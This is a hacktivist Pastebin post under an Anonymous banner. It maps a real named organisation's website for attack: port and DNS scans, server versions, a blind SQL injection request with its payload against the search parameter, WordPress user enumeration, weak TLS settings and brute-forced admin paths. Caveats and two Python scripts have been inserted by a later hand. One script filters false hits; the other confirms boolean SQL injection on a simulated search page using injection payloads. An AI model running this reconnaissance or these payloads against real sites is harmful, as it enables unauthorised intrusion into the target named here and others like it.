Title: Exploitation/www.iqt.org
Author: Sneakyone12
Pastebin link: http://pastebin.com/w0q4NgNj
First Edit: Wednesday 29th of April 2015 09:51:41 AM CDT
Last Edit: Wednesday 29th of April 2015 09:51:41 AM CDT

We are Anonymous
We are Legion
We do not forgive
We do not forget
Expect us.

Hacktivists Forever.

Pentest of iqt.org @ 65% / very Exploitable from every Angle.

== https://www.iqt.org/
--
Non-authoritative answer:
Name:    www.iqt.org
Address: 38.127.128.20
--
scan report for 38.127.128.20
Host is up (0.025s latency).
PORT     STATE    SERVICE
80/tcp   open     http
--/
Server Type:  lighttpd/1.4.35
(Banner only. A server version string is not itself an exploit; the SQL injection finding listed under EXPLOITS is against the site's search parameter, not against lighttpd.)
--
38.127.128.20
0 site(s) hosted on ip 38.127.128.20 (reverse-IP lookup)
Location:   Arlington, United States
---
HTTP Headers for www.iqt.org
==============
HTTP/1.1 301 Moved Permanently
Location: https://www.iqt.org/
Connection: close
Date: Wed, 29 Apr 2015 11:30:15 GMT
Server: lighttpd/1.4.35
----/
MD5 sum of host name:    5a6d285e45428841aefff0f8eca149e5
SHA1 sum of host name:   7060e392c2e06f76afc2bebe65dc290eb3d07052
SHA256 sum of host name: c43a6aae27757ec4b6ef6a9e51e2e1ba99a15217882febe9e0027132d306072b
--
https://www.iqt.org/robots.txt
# robots.txt
(no Disallow entries shown, so it gives no hints about hidden paths)
--
Name Servers
============
(Only TCP ports are listed below. DNS normally answers on 53/udp, which a TCP port scan does not cover, so "80/tcp only" on ns2 and ns3 does not mean they are not serving DNS.)

ns1.iqt.org        38.103.36.99
- scan report for 38.103.36.99
Host is up (0.033s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
80/tcp   open     http
--------------------------------
ns2.iqt.org       38.127.128.200
- scan report for ns1.iqt.org (38.127.128.200)
  (the scanner's reverse lookup of 38.127.128.200 returned ns1.iqt.org, although the zone lists it as ns2)
Host is up (0.0059s latency).
PORT     STATE    SERVICE
80/tcp   open     http
--------------------------------
ns3.iqt.org       38.122.223.132
- scan report for 38.122.223.132
Host is up (0.0058s latency).
PORT     STATE    SERVICE
80/tcp   open     http
--------------------------------

www.iqt.org (38.127.128.202)
Server:     lighttpd/1.4.35
IP Address: 38.127.128.202
Port:       443
Hostname:   www.iqt.org
(The lookup at the top resolved www.iqt.org to 38.127.128.20, while this TLS scan ran against 38.127.128.202. Confirm which address actually answers on 443 for the www host before relying on either set of results.)

EXPLOITS:
=========
The whole target has no protection (X-Frame-Options header) against ClickJacking attack.
(A Content-Security-Policy frame-ancestors directive protects against framing in the same way; neither header is present in the responses shown here.)
---
Blind SQL injection was found at: "https://www.iqt.org/", using HTTP method GET. The injectable parameter is: "s".

GET https://www.iqt.org/?s=95"%20OR%20"95"="95&searchsubmit-mobile=Hello%20World HTTP/1.1
Host: www.iqt.org

(Caveat: this is a differential scanner result, i.e. the page returned for the injected true condition differed from the page for a false one. A search parameter returns a different page for every string it is given and usually echoes that string back, which is the classic source of false positives for this check. Confirm it by hand with a true/false pair whose only difference is the truth of the injected condition, with the echoed term stripped from the responses and the comparison repeated several times, before treating it as exploitable.)
---
The target site *has* a DNS wildcard configuration.
(Every name under the zone resolves, so subdomain brute-force results are meaningless unless filtered against the wildcard answer.)
---
"X-Powered-By" header for this HTTP server is: "PHP/5.3.21".
(PHP 5.3 stopped receiving security fixes in August 2014, so if the header is accurate this is an unsupported runtime.)
---
The URL "https://www.iqt.org/" has the following allowed methods, which include DAV methods: ACL, CHECKIN, CHECKOUT, CONNECT, COPY, GET, HEAD, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKWORKSPACE, MOVE, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SEARCH, TRACE, UNCHECKOUT, UNLINK, UNLOCK.
(Caveat: this list comes from the OPTIONS response. Advertising a method is not the same as serving it; send a real PROPFIND or MKCOL and check that it is not refused with 405 or 501 before reporting WebDAV exposure. TRACE is worth testing the same way.)
---
https://www.iqt.org/wp-login.php
WordPress version "2.7.1" found from data

GET https://www.iqt.org/wp-includes/js/thickbox/thickbox.css HTTP/1.1
Host: www.iqt.org
Cookie: wordpress_test_cookie=WP+Cookie+check

(The version is fingerprinted from the hash of a static file. The same file can be unchanged across many releases, so this may not be the running version; confirm it before choosing exploits by version number.)
---
WordPress user "500" found from enumeration.
GET https://www.iqt.org/?author=2 HTTP/1.1
Host: www.iqt.org
Cookie: wordpress_test_cookie=WP+Cookie+check
---

--
Server configuration contains weak cipher suites
  Cipher suites with known weaknesses should be disabled
- Server may have sent unnecessary certificates in the SSL/TLS negotiation
  Users may experience slower performance
- Server uses RC4 cipher with modern browsers
  More secure ciphers are available for TLS 1.1 and newer
- Server is using RC4-based ciphersuites which have known vulnerabilities
  Evaluate your client compatibility requirements to determine if you can disable RC4-based ciphersuites
- Server configuration does not meet FIPS guidelines
  Federal standards for data handling are not being met
-

SSL Configuration:
=================
SSL 3.0 Disabled: Fail (SSL 3.0 is still offered)
- Weak ciphersuites disabled: Fail
- OCSP Stapling: Fail
- PCI Compliant: Fail
- FIPS Compliant: Fail

Certificate Chain Tests:
=======================
Unnecessary Certificates in Chain: Fail

HTTP Tests:
===========
Domain name resolves to IPv6 address: Fail (informational only: no AAAA record, not a weakness)

-----------------------------------------------------------------------------------------------

File check:
==========
URL: https://www.iqt.org/admin/index.php                              | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/administrator/index.php                      | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/board/index.php                              | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/ccms/index.php                               | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/community/index.php                          | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/faqman/index.php                             | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/index.php                                    | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/livredor/index.php                           | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/modules/Search/index.php                     | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/php/gaestebuch/admin/index.php               | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/php/index.php                                | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/robots.txt                                   | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/search/htx/sqlqhit.asp                       | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/search/htx/SQLQHit.asp                       | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/search/SQLQHit.asp                           | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/search/sqlqhit.asp                           | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/staticpages/index.php                        | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/supporter/index.php                          | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/ttforum/index.php                            | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/wp-content/plugins/akismet/readme.txt        | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/xmlrpc.php                                   | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/zentrack/index.php                           | [+] CODE: HTTP/1.0 200 OK

======================================================================

Directory check:
================
URL: https://www.iqt.org/feed/                                        | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/home/                                        | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/news/                                        | [+] CODE: HTTP/1.0 200 OK
URL: https://www.iqt.org/rss/

======================================================================

(Caveat on the file and directory checks: every probed path returned 200, including ASP pages that cannot exist on a lighttpd/PHP host and both case variants of the same .asp path. The host answers every request with 200, so the status code alone proves nothing here. Each "hit" has to be compared against the response for a path that certainly does not exist; a body identical to it apart from the echoed path means "not found". Of the list, robots.txt, xmlrpc.php and the bundled Akismet readme are the entries plausible on a WordPress install, and even those should be confirmed by content.)

Deep in the Matrix you will find us "watching you 'watching us' watching you"

Big ups to the Anonymous Family WorldWide <3
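The file and directory check above reports 200 for every path it tried, which makes the list useless until each hit is compared with the answer for a path that cannot exist. The following is an added example, not code from the paste or its author, that does that triage. The server is simulated in-process with a few constructed "real" resources and a front controller that answers every other path with 200 and a generic not-found page echoing the requested path (the behaviour the results above imply); the resource contents, the `mock_fetch` callable and the `.nonexistent` probe paths are assumptions made for the example. Against a live host, `fetch` would wrap an HTTP client returning the same (status, content type, body) triple.

```python
"""Triage of directory brute-force hits on a host that answers 200 for everything.

Added example, not from the original paste.  Server responses are simulated.
"""
import hashlib
import html
import secrets
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, str, str]  # (status, content-type, body)

# Constructed sample resources for the simulated host (assumption).
REAL = {
    "/robots.txt": ("text/plain", "# robots.txt\n"),
    "/xmlrpc.php": ("text/plain", "XML-RPC server accepts POST requests only."),
    "/wp-content/plugins/akismet/readme.txt": ("text/plain", "=== Akismet ===\nPlugin readme.\n"),
}


def mock_fetch(path: str) -> Response:
    """Simulated server: known files as-is, every other path gets a 200
    'not found' page that echoes the path (a catch-all front controller)."""
    if path in REAL:
        ctype, body = REAL[path]
        return 200, ctype, body
    body = ("<html><body><h1>Not found</h1><p>Nothing at "
            + html.escape(path) + ".</p></body></html>")
    return 200, "text/html", body


def signature(fetch: Callable[[str], Response], path: str) -> str:
    """Status, content type and a hash of the body with the echoed path
    removed, so two not-found pages for different paths compare equal."""
    status, ctype, body = fetch(path)
    for reflected in (html.escape(path), path):
        body = body.replace(reflected, "")
    digest = hashlib.sha256(body.encode()).hexdigest()
    return f"{status}|{ctype}|{digest}"


def catch_all_signature(fetch: Callable[[str], Response], probes: int = 3) -> Optional[str]:
    """Request several paths that cannot exist.  A consistent answer is the
    host's 'not found' signature, whether it uses 404 or 200 for it.
    Inconsistent answers (dynamic content) mean we cannot decide."""
    sigs = {signature(fetch, f"/{secrets.token_hex(8)}.nonexistent")
            for _ in range(probes)}
    return sigs.pop() if len(sigs) == 1 else None


def triage(fetch: Callable[[str], Response], hits: List[str]) -> Dict[str, str]:
    """Label each hit 'catch-all' when it matches the not-found signature,
    'real' when its response differs, 'undecided' if no baseline exists."""
    base = catch_all_signature(fetch)
    if base is None:
        return {p: "undecided" for p in hits}
    return {p: ("catch-all" if signature(fetch, p) == base else "real")
            for p in hits}


# A subset of the hits from the file/directory check above.
HITS = [
    "/admin/index.php",
    "/administrator/index.php",
    "/search/htx/sqlqhit.asp",
    "/search/htx/SQLQHit.asp",
    "/robots.txt",
    "/wp-content/plugins/akismet/readme.txt",
    "/xmlrpc.php",
    "/feed/",
]

if __name__ == "__main__":
    for path, verdict in triage(mock_fetch, HITS).items():
        print(f"{verdict:9} {path}")
```

Pages with per-request nonces or timestamps will make the probes disagree; the fix is to extend the normalisation in `signature` (strip the dynamic tokens) rather than to lower the bar for "real".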
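The blind SQL injection entry under EXPLOITS is a scanner's differential result on a search parameter. The following is an added example, not code from the paste or its author, showing how to confirm such a claim: a true/false pair of injected conditions is compared with the baseline page after the echoed search term has been stripped, over several rounds, and contrasted with the naive "do the two responses differ at all" heuristic that produces the false positive. Both "sites" are simulated in-process with sqlite3 so the example runs offline; the table, its columns, the `LIKE '%term%'` query shape and the `fetch` callable are assumptions. The paste's payload used double quotes; SQLite treats double quotes as identifiers, so the payloads here use single quotes and close the assumed LIKE context with a trailing `%`.

```python
"""Confirming a boolean-based blind SQL injection claim on a search parameter.

Added example, not from the original paste.  Two search endpoints are
simulated with sqlite3: one concatenates the term into the SQL string, the
other binds it as a parameter.  Sample posts are constructed for the example.
"""
import hashlib
import html
import sqlite3
from typing import Callable

# Constructed sample data (assumption): the search matches post bodies,
# but the result page lists only titles.
POSTS = [
    ("Quarterly update", "Numbers are in; the offsite is next month."),
    ("Hiring", "We are hiring two engineers for the platform team."),
    ("Travel notes", "Notes from the offsite: roadmap, then dinner."),
]


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (title TEXT, body TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?)", POSTS)
    return con


def _render(term: str, titles: list) -> str:
    # Like most CMS search pages, the term is echoed back (HTML-escaped).
    items = "".join(f"<li>{html.escape(t)}</li>" for t in titles)
    return ("<html><body><h1>Search results for: " + html.escape(term)
            + f"</h1><ul>{items}</ul><p>footer</p></body></html>")


def vulnerable_search(term: str) -> str:
    """Search endpoint that concatenates the term into the query (assumed
    shape: ... WHERE body LIKE '%term%')."""
    sql = f"SELECT title FROM posts WHERE body LIKE '%{term}%' ORDER BY rowid"
    rows = _db().execute(sql).fetchall()
    return _render(term, [r[0] for r in rows])


def safe_search(term: str) -> str:
    """Same endpoint with a bound parameter: the term can never become SQL."""
    rows = _db().execute(
        "SELECT title FROM posts WHERE body LIKE ? ORDER BY rowid",
        ("%" + term + "%",)).fetchall()
    return _render(term, [r[0] for r in rows])


def fingerprint(body: str, term: str) -> str:
    """Hash of the page with every reflection of the submitted term removed,
    so a page that merely echoes the query does not look 'different'."""
    for reflected in (html.escape(term), term):
        body = body.replace(reflected, "")
    return hashlib.sha256(body.encode()).hexdigest()


def naive_or_check(fetch: Callable[[str], str], base: str) -> bool:
    """The heuristic behind many scanner hits: do the OR-true and OR-false
    pages differ at all?  Any echoed search term makes this answer yes."""
    true_page = fetch(base + "%' OR '1%'='1")
    false_page = fetch(base + "%' OR '1%'='2")
    return true_page != false_page


def confirm_boolean_sqli(fetch: Callable[[str], str], base: str, rounds: int = 3) -> bool:
    """The injected TRUE condition must reproduce the baseline page and the
    FALSE condition must change it, consistently across several rounds.
    Payloads close the assumed LIKE '%...%' context with a '%'; a real
    target needs the payload shaped to its own query."""
    true_term = base + "%' AND '1%'='1"
    false_term = base + "%' AND '1%'='2"
    for _ in range(rounds):
        baseline = fingerprint(fetch(base), base)
        t = fingerprint(fetch(true_term), true_term)
        f = fingerprint(fetch(false_term), false_term)
        if not (baseline == t and baseline != f):
            return False
    return True


if __name__ == "__main__":
    for name, site in (("vulnerable", vulnerable_search), ("safe", safe_search)):
        print(f"{name:10} naive differ={naive_or_check(site, 'offsite')} "
              f"confirmed={confirm_boolean_sqli(site, 'offsite')}")
```

Against the paste's target, `fetch` would be a function issuing `GET /?s=<term>` with urllib and returning the body; the naive check flags the parameterised site too, because the search term is reflected, while the confirmation step only passes where the injected condition actually changes the result set.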